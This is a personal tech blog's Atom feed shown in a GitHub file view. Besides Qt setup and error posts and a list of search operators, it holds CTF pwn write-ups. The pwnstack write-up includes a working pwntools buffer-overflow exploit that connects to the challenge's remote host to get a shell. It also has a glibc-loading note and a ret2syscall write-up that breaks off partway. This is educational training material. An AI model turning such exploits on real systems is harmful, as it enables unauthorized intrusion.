-
Notifications
You must be signed in to change notification settings - Fork 0
/
atom.xml
543 lines (277 loc) · 185 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>技术栈</title>
<subtitle>Share station</subtitle>
<link href="https://www.rgzzplus.com/atom.xml" rel="self"/>
<link href="https://www.rgzzplus.com/"/>
<updated>2022-10-17T00:26:49.173Z</updated>
<id>https://www.rgzzplus.com/</id>
<author>
<name>rgzzplus</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>QTCreater食用技巧</title>
<link href="https://www.rgzzplus.com/2022/10/17/QTCreater%E9%A3%9F%E7%94%A8%E6%8A%80%E5%B7%A7/"/>
<id>https://www.rgzzplus.com/2022/10/17/QTCreater%E9%A3%9F%E7%94%A8%E6%8A%80%E5%B7%A7/</id>
<published>2022-10-17T00:24:14.000Z</published>
<updated>2022-10-17T00:26:49.173Z</updated>
<content type="html"><![CDATA[<h1 id="qt-creater使用技巧"><a class="markdownIt-Anchor" href="#qt-creater使用技巧"></a> Qt Creater使用技巧</h1><p><img src="/2022/10/17/QTCreater%E9%A3%9F%E7%94%A8%E6%8A%80%E5%B7%A7/image-20220925142033220.png" alt="image-20220925142033220"></p><p><img src="/2022/10/17/QTCreater%E9%A3%9F%E7%94%A8%E6%8A%80%E5%B7%A7/image-20220925143842790.png" alt="image-20220925143842790"></p><h1 id="qt报错"><a class="markdownIt-Anchor" href="#qt报错"></a> QT报错</h1><h2 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h2><p><a href="https://www.cnblogs.com/mengydz/p/14781121.html">/usr/bin/ld: 找不到 -lpulse-mainloop-glib ,-lpulse ,-lglib-2.0,collect2: error: ld returned 1</a></p><p>注意:如果QT中在proj中加了multimedia、multimediawidgets,使用了QCamera就有可能出现该错误。这是由于没有找到链接库:</p><p>解决方法:<br>1)在usr目录下输入命令行:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sudo find / -name libpulse.so*</span><br><span class="line"></span><br><span class="line">sudo <span class="built_in">cp</span> /usr/lib/x86_64-linux-gnu/libpulse.so.0 /usr/lib/libpulse.so</span><br><span class="line"></span><br><span class="line">在lib下就出现了libpulse.so</span><br></pre></td></tr></table></figure><p>2)在usr目录下输入命令行:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sudo find / -name libpulse-mainloop-glib.so*</span><br><span class="line"></span><br><span class="line">sudo <span class="built_in">cp</span> /usr/lib/x86_64-linux-gnu/libpulse-mainloop-glib.so.0.0.5 /usr/lib/libpulse-mainloop-glib.so</span><br><span class="line"></span><br><span class="line">在lib下就出现了libpulse-mainloop-glib.so</span><br></pre></td></tr></table></figure><p>3)在usr目录下输入命令行:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sudo find / -name libglib-2.0.so*</span><br><span class="line"></span><br><span class="line">sudo <span class="built_in">cp</span> /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0 /usr/lib/libglib-2.0.so</span><br><span class="line"></span><br><span class="line">在lib下就出现了libglib-2.0.so</span><br></pre></td></tr></table></figure><p><img src="/2022/10/17/QTCreater%E9%A3%9F%E7%94%A8%E6%8A%80%E5%B7%A7/image-20220928221619195.png" alt="image-20220928221619195"></p><h2 id="0x2"><a class="markdownIt-Anchor" href="#0x2"></a> 0x2</h2><p><img src="/2022/10/17/QTCreater%E9%A3%9F%E7%94%A8%E6%8A%80%E5%B7%A7/image-20220929094743081.png" alt="image-20220929094743081"></p><p>[Qt【Could not parse stylesheet of object 0x7f7990 】</p><p>查找自己所写的 setstylesheet();</p><p>然后看里面的括号标点什么的有没有多余的,删除即可解决。</p><p>我的是图片路径前缺少 url,如下光标处添加 url 字符即可</p><p><img src="/2022/10/17/QTCreater%E9%A3%9F%E7%94%A8%E6%8A%80%E5%B7%A7/image-20220929094916223.png" alt="image-20220929094916223"></p>]]></content>
<summary type="html"><h1 id="qt-creater使用技巧"><a class="markdownIt-Anchor" href="#qt-creater使用技巧"></a> Qt Creater使用技巧</h1>
<p><img src="/2022/10/17/QTCreater%E9%A</summary>
<category term="c++" scheme="https://www.rgzzplus.com/categories/c/"/>
<category term="QT" scheme="https://www.rgzzplus.com/tags/QT/"/>
</entry>
<entry>
<title>QT安装教程</title>
<link href="https://www.rgzzplus.com/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/"/>
<id>https://www.rgzzplus.com/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/</id>
<published>2022-10-17T00:22:14.000Z</published>
<updated>2022-10-17T00:25:21.573Z</updated>
<content type="html"><![CDATA[<p>本文转载自:<a href="https://www.cnblogs.com/minuy/p/14430897.html">Linux下安装QT开发环境</a></p><h1 id="linux下安装qt开发环境"><a class="markdownIt-Anchor" href="#linux下安装qt开发环境"></a> Linux下安装QT开发环境</h1><h2 id="零-下载安装包"><a class="markdownIt-Anchor" href="#零-下载安装包"></a> 零、下载安装包</h2><p>从以下网址可以下载QT的所有版本:</p><blockquote><p><a href="https://download.qt.io/">https://download.qt.io/</a></p></blockquote><p>这次演示安装5.9.0版本,因为是长期支持的版本,所以进入到archive/qt/5.9/5.9.0</p><p><img src="/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/../../document/Markdown/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/2010295-20210222160443163-190757006.png" alt="img"></p><p>这里,我们是Linux,因此选择Linux版本的安装包,点击文件名下载并保存文件。如果下载较慢建议使用迅雷等下载工具。</p><blockquote><p>安装包下载地址:<a href="https://download.qt.io/archive/qt/5.9/5.9.0/qt-opensource-linux-x64-5.9.0.run">https://download.qt.io/archive/qt/5.9/5.9.0/qt-opensource-linux-x64-5.9.0.run</a></p></blockquote><h2 id="壹-安装"><a class="markdownIt-Anchor" href="#壹-安装"></a> 壹、安装</h2><p>下载完成后打开终端,进入到下载目录,一般在 <em>~/下载</em> 文件夹(输入不了中文可以用ls命令列出后复制过去)。</p><p><img src="/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/../../document/Markdown/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/2010295-20210222160458536-1252883591.png" alt="img"></p><p>给安装包分配运行权限</p><p>命令:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chmod +x qt-opensource-linux-x64-5.9.0.run</span><br></pre></td></tr></table></figure><p><img src="/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/../../document/Markdown/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/2010295-20210222160510358-651776639.png" alt="img"></p><p>运行安装程序,进入到安装界面</p><p>命令:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./qt-opensource-linux-x64-5.9.0.run</span><br></pre></td></tr></table></figure><p><img src="/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/../../document/Markdown/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/2010295-20210222160559148-2047339372.png" alt="img"></p><p>需要登录,可以点Skip跳过</p><p><img src="/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/../../document/Markdown/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/2010295-20210222160545697-1801504264.png" alt="img"></p><p>选择安装组件,根据自己的需要勾选需要安装的组件,但是建议这样选择(带QT的和gcc全选)</p><p><img src="/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/../../document/Markdown/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/2010295-20210222160611259-347874521.png" alt="img"></p><p>之后根据向导一步一步来就能安装好了~</p><h2 id="贰-错误解决"><a class="markdownIt-Anchor" href="#贰-错误解决"></a> 贰、错误解决</h2><p>一般安装好之后会遇到两个问题</p><p>一个提示,执行qmake时出错</p><figure class="highlight vbnet"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">15</span>:<span class="number">50</span>:<span class="number">56</span>: Could <span class="built_in">not</span> determine which <span class="string">"make"</span> command <span class="keyword">to</span> run. Check the <span class="string">"make"</span> <span class="keyword">step</span> <span class="keyword">in</span> the build configuration.</span><br><span class="line"><span class="keyword">Error</span> <span class="keyword">while</span> building/deploying project planets-qml (kit: Desktop Qt <span class="number">5.9</span>.<span class="number">0</span> GCC <span class="number">64</span>bit)</span><br><span class="line"></span><br><span class="line"><span class="keyword">When</span> executing <span class="keyword">step</span> <span class="string">"qmake"</span></span><br></pre></td></tr></table></figure><p>另一个提示,找不到lGL</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">../../../../5.9/gcc_64/include/QtGui/qopengl.h:139:13: fatal error: GL/gl.h: No such file or directory</span><br><span class="line"> 139 | <span class="comment"># include <GL/gl.h></span></span><br><span class="line"> | ^~~~~~~~~</span><br><span class="line">compilation terminated.</span><br><span class="line">make: *** [Makefile:1009: main.o] Error 1</span><br><span class="line">15:55:01: 进程<span class="string">"/usr/bin/make"</span>退出,退出代码 2 。</span><br><span class="line">Error <span class="keyword">while</span> building/deploying project planets-qml (kit: Desktop Qt 5.9.0 GCC 64bit)</span><br><span class="line">When executing step <span class="string">"Make"</span></span><br></pre></td></tr></table></figure><p>原因是没安装对应的软件。</p><p>解决第一个错误:</p><figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt <span class="keyword">install </span>cmake g++</span><br></pre></td></tr></table></figure><p>解决第二个错误:</p><figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt <span class="keyword">install </span>libgl1-mesa-dev</span><br></pre></td></tr></table></figure><h2 id="叁-结果"><a class="markdownIt-Anchor" href="#叁-结果"></a> 叁、结果</h2><p>执行上述操作后,能正常编译运行示例:<br><img src="/2022/10/17/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/../../document/Markdown/QT%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/2010295-20210222160810909-2031390402.png" alt="img"></p><h2 id="肆-参考"><a class="markdownIt-Anchor" href="#肆-参考"></a> 肆、参考:</h2><p><a href="http://c.biancheng.net/view/3851.html">http://c.biancheng.net/view/3851.html</a></p><p><a href="http://c.biancheng.net/view/3886.html">http://c.biancheng.net/view/3886.html</a></p><p><a href="http://c.biancheng.net/view/3858.html">http://c.biancheng.net/view/3858.html</a></p><p><a href="https://blog.csdn.net/aaa123524457/article/details/82668194">https://blog.csdn.net/aaa123524457/article/details/82668194</a></p>]]></content>
<summary type="html"><p>本文转载自:<a href="https://www.cnblogs.com/minuy/p/14430897.html">Linux下安装QT开发环境</a></p>
<h1 id="linux下安装qt开发环境"><a class="markdownIt-Anchor"</summary>
<category term="转载" scheme="https://www.rgzzplus.com/categories/%E8%BD%AC%E8%BD%BD/"/>
<category term="QT" scheme="https://www.rgzzplus.com/tags/QT/"/>
</entry>
<entry>
<title>高级搜索</title>
<link href="https://www.rgzzplus.com/2022/10/14/%E9%AB%98%E7%BA%A7%E6%90%9C%E7%B4%A2/"/>
<id>https://www.rgzzplus.com/2022/10/14/%E9%AB%98%E7%BA%A7%E6%90%9C%E7%B4%A2/</id>
<published>2022-10-14T12:32:53.000Z</published>
<updated>2022-10-14T12:34:10.944Z</updated>
<content type="html"><![CDATA[<h1 id="高级搜索模式"><a class="markdownIt-Anchor" href="#高级搜索模式"></a> 高级搜索模式</h1><ul><li><p>双引号 (" ")<br>表示完全匹配。<br>例:搜索 <strong>“操作系统”</strong>,则会完全匹配关键字搜索。</p></li><li><p>*<br>常用的通配符可用来表示字符串。<br>例:搜索<strong>我的*不是梦</strong>,则会匹配出 <strong>我的未来不是梦</strong> 等结果。</p></li><li><p>?<br>类似*,只不过它表示单个字符。<br>例:<strong>计算机?级考试</strong>,则会匹配出 <strong>计算机等级考试</strong> 等结果</p></li><li><p>波浪号 (~)<br>寻找同义词,**PS:**经过我的测试,不怎么好用</p></li><li><p>OR<br>多个关键字默认为和,用 <strong>OR</strong> 可以表示或,可用 <strong>|</strong> 来代替。<br>例:<strong>古诗词or名人名言</strong></p></li><li><p>and<br>关键词组合,可用 <strong>+</strong> 或 <strong>空格</strong> 代替。<br>例:<strong>乔布斯+名人名言</strong></p></li><li><p>not<br>可用 - (减号) 代替,表示不包含后面的元素,前面是空格,后面无空格。<br>例:搜索 <strong>JavaScript -jquery</strong>,则得到的结果中不包含jquery。</p></li><li><p>site:<br>用来搜索某个域名下的所有文件。<br>例:<strong>python site:www.runoob.com</strong></p></li><li><p>filetype:<br>用于搜索特定文件格式。<br>例:<strong>filetype:txt 斗罗大陆</strong></p></li><li><p>inurl:<br>用于搜索查询词出现在url中的页面,支持中文。<br>例:<strong>inurl:vue</strong></p></li><li><p>intitle:<br>返回页面title中包含关键字的页面。<br>例:<strong>intitle:大王饶命</strong></p></li><li><p>allintitle:<br>包含多个关键字。<br>例:<strong>allintitle:大王饶命 吕小鱼</strong></p></li><li><p>related:<br>搜索相似网站。<br>例:related:<a href="http://www.google.com">http://www.google.com</a></p></li><li><p>define:<br>相当于字典,支持汉字。<br>例:<strong>define:引擎</strong>,**PS:**经过我的测试,不怎么好用</p></li></ul>]]></content>
<summary type="html"><h1 id="高级搜索模式"><a class="markdownIt-Anchor" href="#高级搜索模式"></a> 高级搜索模式</h1>
<ul>
<li>
<p>双引号 (&quot; &quot;)<br>
表示完全匹配。<br>
例:搜索 <strong>“</summary>
<category term="高级搜索" scheme="https://www.rgzzplus.com/categories/%E9%AB%98%E7%BA%A7%E6%90%9C%E7%B4%A2/"/>
<category term="搜索引擎" scheme="https://www.rgzzplus.com/tags/%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E/"/>
</entry>
<entry>
<title>pwnstack</title>
<link href="https://www.rgzzplus.com/2022/10/03/pwnstack/"/>
<id>https://www.rgzzplus.com/2022/10/03/pwnstack/</id>
<published>2022-10-03T01:38:34.000Z</published>
<updated>2022-10-03T01:39:42.462Z</updated>
<content type="html"><![CDATA[<blockquote><p><a href="https://adworld.xctf.org.cn/challenges/details?hash=de8efbe6-17ae-11ed-9827-fa163e4fa633&task_category_id=2">题目地址</a> pwnstack</p></blockquote><h2 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h2><p>下载文件到本地后,首先,file 看看文件类型,顺便看看保护机制。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~/下载/pwnstack$ file pwn2</span><br><span class="line">pwn2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=62aa40d64871e142a32827b4e403772e72f67fba, not stripped</span><br><span class="line">sakura@Kylin:~/下载/pwnstack$ checksec pwn2</span><br><span class="line">[*] '/home/sakura/下载/pwnstack/pwn2'</span><br><span class="line"> Arch: amd64-64-little</span><br><span class="line"> RELRO: Partial RELRO</span><br><span class="line"> Stack: No canary found</span><br><span class="line"> NX: NX enabled</span><br><span class="line"> PIE: No PIE (0x400000)</span><br></pre></td></tr></table></figure><p>可以看到,这是一个 64 位程序,并且只开启了 NX 保护机制。</p><h2 id="0x2"><a class="markdownIt-Anchor" href="#0x2"></a> 0x2</h2><p>再拖进 IDA 中看看源码。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">__int64 <span class="title function_">vuln</span><span class="params">()</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">char</span> buf[<span class="number">160</span>]; <span class="comment">// [rsp+0h] [rbp-A0h] BYREF</span></span><br><span class="line"></span><br><span class="line"> <span class="built_in">memset</span>(buf, <span class="number">0</span>, <span class="keyword">sizeof</span>(buf)); <span class="comment">//将 buf全部置为 0</span></span><br><span class="line"> read(<span class="number">0</span>, buf, <span class="number">0xB1</span>uLL); <span class="comment">//0xB1 = 177 bytes</span></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">__int64 <span class="title function_">initsetbuf</span><span class="params">()</span></span><br><span class="line">{</span><br><span class="line"> setvbuf(<span class="built_in">stdin</span>, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line"> setvbuf(<span class="built_in">stdout</span>, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line"> setvbuf(<span class="built_in">stderr</span>, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">{</span><br><span class="line"> initsetbuf(argc, argv, envp);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"this is pwn1,can you do that??"</span>);</span><br><span class="line"> vuln();</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>由于只开启了 NX,只需溢出 buf 覆盖函数返回值即可。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">peda$ </span><span class="language-bash">pattern create 200</span></span><br><span class="line"><span class="meta">peda$ </span><span class="language-bash">pattern offset .........</span></span><br></pre></td></tr></table></figure><p><img src="/2022/10/03/pwnstack/image-20220922202634809.png" alt="image-20220922202634809"></p><p><img src="/2022/10/03/pwnstack/image-20220922202345579.png" alt="image-20220922202345579"></p><p>得到填充长度为 168 byte</p><h2 id="0x3"><a class="markdownIt-Anchor" href="#0x3"></a> 0x3</h2><p>先看看 pwn2 中是否有 system() 调用,如果有就不用我们自己构建了。</p><p><img src="/2022/10/03/pwnstack/image-20220922220713163.png" alt="image-20220922220713163"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line"></span><br><span class="line"><span class="comment">#sh = process("./pwn2")</span></span><br><span class="line">sh = remote(<span class="string">'61.147.171.105'</span>, <span class="number">54665</span>)</span><br><span class="line"><span class="comment">#context.log_level = 'debug'</span></span><br><span class="line"></span><br><span class="line">system= <span class="number">0x400766</span></span><br><span class="line"><span class="comment"># 这里我用 0x400766,而不是 0x400762,是因为不能破坏栈的结构。</span></span><br><span class="line">payload = <span class="string">b'a'</span>*(<span class="number">0xa0</span>)+ <span class="string">b'a'</span>*<span class="number">8</span> + p64(system) </span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure><h2 id="0x4"><a class="markdownIt-Anchor" href="#0x4"></a> 0x4</h2><p><strong>测试</strong></p><p><img src="/2022/10/03/pwnstack/image-20220922221704374.png" alt="image-20220922221704374"></p><p>远程测试:</p><p><img src="/2022/10/03/pwnstack/image-20220922221935298.png" alt="image-20220922221935298"></p>]]></content>
<summary type="html"><blockquote>
<p><a href="https://adworld.xctf.org.cn/challenges/details?hash=de8efbe6-17ae-11ed-9827-fa163e4fa633&amp;task_category_id=2">题目</summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="pwnstack" scheme="https://www.rgzzplus.com/tags/pwnstack/"/>
</entry>
<entry>
<title>PWN题目加载指定版本的glibc</title>
<link href="https://www.rgzzplus.com/2022/10/03/PWN%E9%A2%98%E7%9B%AE%E5%8A%A0%E8%BD%BD%E6%8C%87%E5%AE%9A%E7%89%88%E6%9C%AC%E7%9A%84glibc/"/>
<id>https://www.rgzzplus.com/2022/10/03/PWN%E9%A2%98%E7%9B%AE%E5%8A%A0%E8%BD%BD%E6%8C%87%E5%AE%9A%E7%89%88%E6%9C%AC%E7%9A%84glibc/</id>
<published>2022-10-03T01:38:08.000Z</published>
<updated>2022-10-03T01:40:20.172Z</updated>
<content type="html"><![CDATA[<h3 id="指定libc"><a class="markdownIt-Anchor" href="#指定libc"></a> 指定libc</h3><p>两种方法。一种方法是用patchelf改变elf的ld链接器和libc加载。另一种是跑了个脚本,其实原理都差不多。</p><p>先把libc和ld链接器cp到pwn题目录,用绝对路径不嫌麻烦也行。</p><p>patchelf:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">patchelf --set-interpreter ./ld.so.2 ./elfname</span><br><span class="line">patchelf --set-rpath ./libc-2.2?.so ./elfname</span><br></pre></td></tr></table></figure><p>脚本:(注意 libc 与 elfname 要在一个文件夹下)</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">sh = process(<span class="string">'./elfname'</span>)</span><br><span class="line">libc = ELF(<span class="string">"./libc-2.27.so"</span>)</span><br></pre></td></tr></table></figure><blockquote><p>参考:</p><p><a href="https://surager.pub/_posts/2020-03-10-pwn%E9%A2%98%E7%9B%AE%E6%9C%AC%E5%9C%B0%E8%B0%83%E8%AF%95%E5%8A%A0%E8%BD%BDlibc%E7%89%88%E6%9C%AC/">Pwn题目本地调试加载libc版本</a></p></blockquote>]]></content>
<summary type="html"><h3 id="指定libc"><a class="markdownIt-Anchor" href="#指定libc"></a> 指定libc</h3>
<p>两种方法。一种方法是用patchelf改变elf的ld链接器和libc加载。另一种是跑了个脚本,其实原理都差不多。</p</summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="libc" scheme="https://www.rgzzplus.com/tags/libc/"/>
</entry>
<entry>
<title>ret2syscall</title>
<link href="https://www.rgzzplus.com/2022/09/18/ret2syscall/"/>
<id>https://www.rgzzplus.com/2022/09/18/ret2syscall/</id>
<published>2022-09-18T02:24:54.000Z</published>
<updated>2022-09-29T14:23:18.811Z</updated>
<content type="html"><![CDATA[<blockquote><p><a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/stackoverflow">题目地址</a> ret2syscall</p></blockquote><h2 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h2><p>下载文件到本地后,首先,file 看看文件类型,顺便看看文件类型。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~/下载/ret2syscall$ file rop</span><br><span class="line">rop: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=2bff0285c2706a147e7b150493950de98f182b78, with debug_info, not stripped</span><br><span class="line">sakura@Kylin:~/下载/ret2syscall$ checksec rop</span><br><span class="line">[*] '/home/sakura/下载/ret2syscall/rop'</span><br><span class="line"> Arch: i386-32-little</span><br><span class="line"> RELRO: Partial RELRO</span><br><span class="line"> Stack: No canary found</span><br><span class="line"> NX: NX enabled</span><br><span class="line"> PIE: No PIE (0x8048000)</span><br></pre></td></tr></table></figure><p>可以看到,这是一个 32 位程序,并且只开启了 NX 保护机制。</p><h2 id="0x2"><a class="markdownIt-Anchor" href="#0x2"></a> 0x2</h2><p>再拖进 IDA 中看看源码。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">int</span> v4; <span class="comment">// [esp+1Ch] [ebp-64h] BYREF</span></span><br><span class="line"></span><br><span class="line"> setvbuf(<span class="built_in">stdout</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line"> setvbuf(<span class="built_in">stdin</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"This time, no system() and NO SHELLCODE!!!"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"What do you plan to do?"</span>);</span><br><span class="line"> gets(&v4);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>我们从源码中可以看到 gets() 函数,它能读取字符串直到输入回车才终止。所以它是我们溢出的目标函数,而它把读入的数据放在 v4 中,v4相对 ebp 偏移为 0x64 + 0x8 (源码第3行)。所以我们需要填充 112 个字节才能覆盖返回地址。由于开启了 NX,我们无法自己用shellcode填充栈来获得 shell,所以我们利用程序中的<strong>代码片段(gadgets)</strong> 来获得 shell。</p><h2 id="0x3"><a class="markdownIt-Anchor" href="#0x3"></a> 